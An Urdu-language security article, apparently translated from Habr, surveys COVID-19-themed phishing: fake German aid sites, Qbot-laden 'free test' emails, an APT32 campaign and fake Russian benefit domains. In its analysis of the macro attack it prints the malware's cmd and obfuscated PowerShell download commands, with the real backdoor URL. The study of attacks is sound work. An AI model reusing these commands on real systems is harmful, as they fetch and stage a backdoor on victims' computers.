حملہ آور COVID-19 کے موضوع سے فائدہ اٹھاتے رہتے ہیں، جو ان صارفین کے لیے زیادہ سے زیادہ خطرات پیدا کر رہے ہیں جو وبا سے متعلق ہر چیز میں گہری دلچسپی رکھتے ہیں۔ میں ہم پہلے ہی اس بارے میں بات کر چکے ہیں کہ کورونا وائرس کے تناظر میں کس قسم کے میلویئر نمودار ہوئے، اور آج ہم سوشل انجینئرنگ کی تکنیکوں کے بارے میں بات کریں گے جن کا سامنا روس سمیت مختلف ممالک میں صارفین پہلے ہی کر چکے ہیں۔ عمومی رجحانات اور مثالیں کٹ کے نیچے ہیں۔
میں یاد رکھیں ہم نے اس حقیقت کے بارے میں بات کی کہ لوگ نہ صرف کورونا وائرس اور اس وبا کے دوران، بلکہ مالی معاونت کے اقدامات کے بارے میں بھی پڑھنے کو تیار ہیں؟ یہاں ایک اچھی مثال ہے۔ جرمن ریاست نارتھ رائن ویسٹ فیلیا یا NRW میں ایک دلچسپ فشنگ حملہ دریافت ہوا۔ حملہ آوروں نے وزارت اقتصادیات کی ویب سائٹ کی کاپیاں بنائیں ()، جہاں کوئی بھی مالی امداد کے لیے درخواست دے سکتا ہے۔ ایسا پروگرام اصل میں موجود ہے، اور یہ سکیمرز کے لیے فائدہ مند ثابت ہوا۔ اپنے متاثرین کا ذاتی ڈیٹا حاصل کرنے کے بعد، انہوں نے حقیقی وزارت کی ویب سائٹ پر درخواست دی، لیکن بینک کی دیگر تفصیلات کی نشاندہی کی۔ سرکاری اعداد و شمار کے مطابق اس سکیم کا پتہ چلنے تک ایسی 4 ہزار جعلی درخواستیں کی گئیں۔ نتیجے کے طور پر، متاثرہ شہریوں کے لیے 109 ملین ڈالر جعلسازوں کے ہاتھ لگ گئے۔
کیا آپ COVID-19 کا مفت ٹیسٹ چاہتے ہیں؟
کورونا وائرس پر مبنی فشنگ کی ایک اور نمایاں مثال تھی۔ ای میلز میں پیغامات نے صارفین کی توجہ اپنی طرف مبذول کرائی جس میں ایک پیشکش کی گئی کہ وہ کورونا وائرس کے انفیکشن کے لیے مفت ٹیسٹ کرائیں۔ ان کے ملحق میں Trickbot/Qakbot/Qbot کی مثالیں موجود تھیں۔ اور جب اپنی صحت کی جانچ کرنے کے خواہشمندوں نے "منسلک فارم کو پُر کرنا" شروع کیا تو کمپیوٹر پر ایک بدنیتی پر مبنی اسکرپٹ ڈاؤن لوڈ ہو گیا۔ اور سینڈ باکسنگ ٹیسٹنگ سے بچنے کے لیے، اسکرپٹ نے کچھ وقت کے بعد ہی مین وائرس کو ڈاؤن لوڈ کرنا شروع کیا، جب پروٹیکشن سسٹمز کو یقین ہو گیا کہ کوئی بدنیتی پر مبنی سرگرمی نہیں ہوگی۔
میکرو کو فعال کرنے کے لیے زیادہ تر صارفین کو قائل کرنا بھی آسان تھا۔ ایسا کرنے کے لیے، ایک معیاری چال استعمال کی گئی: سوالنامے کو پُر کرنے کے لیے، آپ کو پہلے میکروز کو فعال کرنے کی ضرورت ہے، جس کا مطلب ہے کہ آپ کو VBA اسکرپٹ چلانے کی ضرورت ہے۔
جیسا کہ آپ دیکھ سکتے ہیں، VBA اسکرپٹ کو خاص طور پر اینٹی وائرس سے ماسک کیا گیا ہے۔
ونڈوز میں انتظار کی ایک خصوصیت ہے جہاں ایپلیکیشن پہلے سے طے شدہ "ہاں" جواب کو قبول کرنے سے پہلے /T <سیکنڈز> کا انتظار کرتی ہے۔ ہمارے معاملے میں، اسکرپٹ نے عارضی فائلوں کو حذف کرنے سے پہلے 65 سیکنڈ انتظار کیا:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
اور انتظار کے دوران، میلویئر ڈاؤن لوڈ ہو گیا۔ اس کے لیے ایک خصوصی پاور شیل اسکرپٹ لانچ کیا گیا تھا۔
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 ویلیو کو ڈی کوڈ کرنے کے بعد، PowerShell اسکرپٹ جرمنی سے پہلے ہیک کیے گئے ویب سرور پر موجود بیک ڈور کو ڈاؤن لوڈ کرتا ہے:
http://automatischer-staubsauger.com/feature/777777.pngاور اسے نام کے تحت محفوظ کرتا ہے:
C:UsersPublictmpdirfile1.exe
فولڈر ‘C:UsersPublictmpdir’ 'tmps1.bat' فائل کو چلانے پر حذف کر دیا جاتا ہے جس میں کمانڈ ہوتی ہے۔ cmd /c mkdir ""C:UsersPublictmpdir"".
سرکاری اداروں پر ٹارگٹ حملہ
مزید برآں، FireEye تجزیہ کاروں نے حال ہی میں ووہان میں سرکاری ڈھانچے کے ساتھ ساتھ چینی وزارت برائے ایمرجنسی مینجمنٹ کو نشانہ بنایا APT32 حملے کی اطلاع دی۔ تقسیم شدہ RTFs میں سے ایک میں نیویارک ٹائمز کے ایک مضمون کا لنک تھا جس کا عنوان تھا۔ . تاہم، اسے پڑھنے پر، میلویئر ڈاؤن لوڈ کیا گیا تھا (FireEye تجزیہ کاروں نے مثال کو METALJACK کے طور پر شناخت کیا)۔
دلچسپ بات یہ ہے کہ پتہ لگانے کے وقت، وائرسٹوٹل کے مطابق، کسی بھی اینٹی وائرس نے اس مثال کا پتہ نہیں لگایا۔
جب آفیشل ویب سائٹس بند ہوں۔
فشنگ حملے کی سب سے حیران کن مثال دوسرے دن ہی روس میں پیش آئی۔ اس کی وجہ 3 سے 16 سال کی عمر کے بچوں کے لیے ایک طویل انتظار کے فائدے کی تقرری تھی۔ جب 12 مئی 2020 کو درخواستیں قبول کرنے کے آغاز کا اعلان کیا گیا تو لاکھوں افراد طویل انتظار کی مدد کے لیے اسٹیٹ سروسز کی ویب سائٹ پر پہنچ گئے اور پورٹل کو ایک پیشہ ور DDoS حملے سے بدتر نہیں لایا۔ جب صدر نے کہا کہ "سرکاری خدمات درخواستوں کے بہاؤ کا مقابلہ نہیں کر سکتیں،" لوگوں نے درخواستیں قبول کرنے کے لیے متبادل سائٹ کے آغاز کے بارے میں آن لائن بات کرنا شروع کر دی۔
مسئلہ یہ ہے کہ متعدد سائٹوں نے ایک ساتھ کام کرنا شروع کر دیا، اور جب کہ ایک، posobie16.gosuslugi.ru پر اصل میں درخواستیں قبول کرتی ہے، مزید .
SearchInform کے ساتھیوں کو .ru زون میں تقریباً 30 نئے فراڈ ڈومینز ملے۔ Infosecurity and Softline Company نے اپریل کے آغاز سے اب تک اسی طرح کی 70 سے زیادہ جعلی سرکاری سروس ویب سائٹس کا سراغ لگایا ہے۔ ان کے تخلیق کار مانوس علامتوں میں ہیرا پھیری کرتے ہیں اور لفظ gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie وغیرہ کے مجموعے بھی استعمال کرتے ہیں۔
ہائپ اور سوشل انجینئرنگ
یہ تمام مثالیں صرف اس بات کی تصدیق کرتی ہیں کہ حملہ آور کامیابی کے ساتھ کورونا وائرس کے موضوع سے رقم کما رہے ہیں۔ اور جتنا زیادہ سماجی تناؤ اور زیادہ غیر واضح مسائل ہوں گے، اسکیمرز کو اہم ڈیٹا چوری کرنے، لوگوں کو اپنے پیسے دینے پر مجبور کرنے، یا مزید کمپیوٹرز کو ہیک کرنے کے امکانات اتنے ہی زیادہ ہوں گے۔
اور یہ دیکھتے ہوئے کہ وبائی مرض نے ممکنہ طور پر غیر تیار لوگوں کو گھر سے بڑے پیمانے پر کام کرنے پر مجبور کیا ہے، نہ صرف ذاتی بلکہ کارپوریٹ ڈیٹا بھی خطرے میں ہے۔ مثال کے طور پر، حال ہی میں مائیکروسافٹ 365 (سابقہ آفس 365) کے صارفین کو بھی فشنگ حملے کا نشانہ بنایا گیا۔ لوگوں کو خطوط کے منسلکات کے طور پر بڑے پیمانے پر "چھوٹ گئے" صوتی پیغامات موصول ہوئے۔ تاہم، فائلیں دراصل ایک HTML صفحہ تھیں جس نے حملے کے متاثرین کو بھیجا تھا۔ . نتیجے کے طور پر، اکاؤنٹ سے تمام ڈیٹا تک رسائی اور سمجھوتہ کا نقصان۔
ماخذ: www.habr.com